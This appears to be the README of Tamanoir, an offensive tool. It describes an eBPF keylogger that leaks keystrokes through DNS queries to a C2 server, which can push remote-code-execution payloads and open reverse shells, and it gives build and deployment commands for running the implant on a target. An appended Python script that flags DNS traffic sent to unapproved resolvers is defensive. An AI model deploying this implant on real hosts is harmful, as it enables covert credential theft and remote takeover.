Tamanoir is structured around 3 components:
- An eBPF program running on a target host. It acts as a keylogger and extracts keystrokes via DNS queries. In the DNS response, the attacker can choose to send chunks of an RCE payload that will be executed on the targeted host.
- The Command & Control server. It acts as a DNS proxy and can inject RCE payloads in DNS responses. It can also handle reverse shell connections.
- The TUI client, which communicates with the C2 server. It is built on top of ratatui.
- what is eBPF
- C2: Command and Control
- RCE: Remote Code Execution
You need a Linux based OS.
To build from source, make sure you have:
- bpf-linker installed.
- Rust installed with nightly toolchain.
- protobuf-compiler
cd tamanoir-ebpf && cargo build --release
cargo build -p tamanoir --release
cargo build -p tamanoir-c2 --release
cargo build -p tamanoir-tui --release
These commands will produce the tamanoir, tamanoir-c2 and tamanoir-tui executables in target/release, which you can add to your $PATH.
You can download the pre-built binaries from the release page
🖥️ on target host:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip <C2 server IP> \
--hijack-ip <locally configured DNS server IP> \
--iface <network interface name>
For example:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.15 \
--hijack-ip 8.8.8.8 \
--iface wlan0
🖥️ on your C2 server host:
sudo tamanoir-c2 start
Note: Make sure port 53 is available.
🖥️ wherever you want to use the client:
tamanoir-tui -i <C2 server IP>
Note: Make sure the C2 server is reachable on port 50051.
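A network-side check for the DNS redirection described above, as an added example that is not part of the Tamanoir project: it flags hosts whose port-53 traffic goes to an address other than the approved resolvers. It assumes redirected queries leave the host addressed to the proxy IP; the flow-record format, function names and sample data are constructed for illustration.

```python
import ipaddress
from collections import Counter

def parse_resolvers(resolv_conf_text):
    """Return the set of nameserver addresses from resolv.conf-style text."""
    resolvers = set()
    for line in resolv_conf_text.splitlines():
        # Strip '#' and ';' comments before tokenising.
        parts = line.split("#", 1)[0].split(";", 1)[0].split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            # Drop an IPv6 zone id (fe80::1%eth0) before normalising.
            resolvers.add(ipaddress.ip_address(parts[1].split("%", 1)[0]))
    return resolvers

def unexpected_dns_flows(flow_lines, allowed_resolvers):
    """Count port-53 flows per (src, dst) whose dst is not an approved resolver."""
    hits = Counter()
    for line in flow_lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed records
        _ts, src, dst, dport, _proto = fields
        if dport != "53":
            continue
        try:
            dst_ip = ipaddress.ip_address(dst)
        except ValueError:
            continue
        if dst_ip not in allowed_resolvers:
            hits[(src, dst)] += 1
    # Noisiest pairs first, then stable ordering by address.
    return sorted(hits.items(), key=lambda kv: (-kv[1], kv[0]))

# Constructed sample data (assumed format: "ts src dst dport proto").
SAMPLE_RESOLV_CONF = """\
# constructed sample
nameserver 8.8.8.8
nameserver 2001:4860:4860::8888
search lan
"""
SAMPLE_FLOWS = [
    "1700000000 192.168.1.20 8.8.8.8 53 udp",
    "1700000001 192.168.1.42 192.168.1.15 53 udp",
    "1700000002 192.168.1.42 192.168.1.15 53 udp",
    "1700000003 192.168.1.42 93.184.216.34 443 tcp",
    "1700000004 192.168.1.20 2001:4860:4860::8888 53 udp",
    "garbage line",
]

if __name__ == "__main__":
    allowed = parse_resolvers(SAMPLE_RESOLV_CONF)
    for (src, dst), n in unexpected_dns_flows(SAMPLE_FLOWS, allowed):
        print(f"{src} sent {n} DNS flows to non-approved resolver {dst}")
```

Feed it flow records collected off-host (firewall or NetFlow exports), since a compromised host's own view of its DNS traffic cannot be trusted.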
Tamanoir is developed for educational purposes only.
GPLv3